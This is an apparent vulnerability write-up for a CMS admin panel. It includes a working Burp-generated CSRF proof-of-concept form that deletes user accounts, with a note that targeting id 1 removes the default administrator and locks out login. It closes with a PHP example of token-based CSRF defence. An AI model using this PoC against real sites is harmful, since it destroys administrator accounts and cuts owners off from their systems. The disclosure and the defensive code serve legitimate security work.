After the administrator logs in, open this page
User list:
delete.html --Delete User
POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.154.82:81/index.php">
<input type="hidden" name="s" value="admin" />
<input type="hidden" name="c" value="member" />
<input type="hidden" name="a" value="del" />
<input type="hidden" name="modelid" value="6" />
<input type="hidden" name="id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
In the form above, name="id" value="2" selects the account to delete. The account ID of the default system administrator (admin) is 1.
Changing value="2" to 1 deletes the default administrator account that ships with the system,
which makes it impossible to log in!
The test screenshots are as follows:

A new system administrator account named kali is created here to verify the CSRF deletion.

Burp Suite captures the request and sends it to the CSRF PoC generation module under Engagement tools.

Save the contents of the CSRF PoC as delete.html, and then open it.

As shown, the kali system administrator account has been deleted.
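A server-side check that would refuse the request the PoC above sends, shown as an added example that is not the CMS's own code. The function names, the `csrf_token` field and the session array layout are assumptions for illustration.

```php
<?php
// Added example, not the CMS's code. csrf_token(), may_delete_member() and
// the 'csrf_token' field name are hypothetical.

// Issue one random token per session; the admin UI embeds it in every form.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a request may perform the destructive a=del action.
function may_delete_member(string $method, array $post, array $session): bool {
    // The PoC form has no method attribute, so the browser submits it as GET.
    // State-changing actions should only be accepted over POST.
    if ($method !== 'POST') {
        return false;
    }
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // Reject missing tokens outright; hash_equals compares in constant time.
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// Constructed requests for the demonstration (no real traffic involved).
$session = [];
$token = csrf_token($session);

$cases = [
    'PoC form (GET, no token)'       => ['GET',  []],
    'cross-site POST, no token'      => ['POST', ['id' => '2']],
    'cross-site POST, guessed token' => ['POST', ['id' => '2', 'csrf_token' => str_repeat('0', 64)]],
    'admin UI POST with token'       => ['POST', ['id' => '2', 'csrf_token' => $token]],
];

foreach ($cases as $label => [$method, $post]) {
    $verdict = may_delete_member($method, $post, $session) ? 'allowed' : 'rejected';
    printf("%-32s %s\n", $label, $verdict);
}
```

Only the last case is allowed: a page on another origin can make the administrator's browser send the request with its session cookie, but it cannot read the per-session token it would need to include.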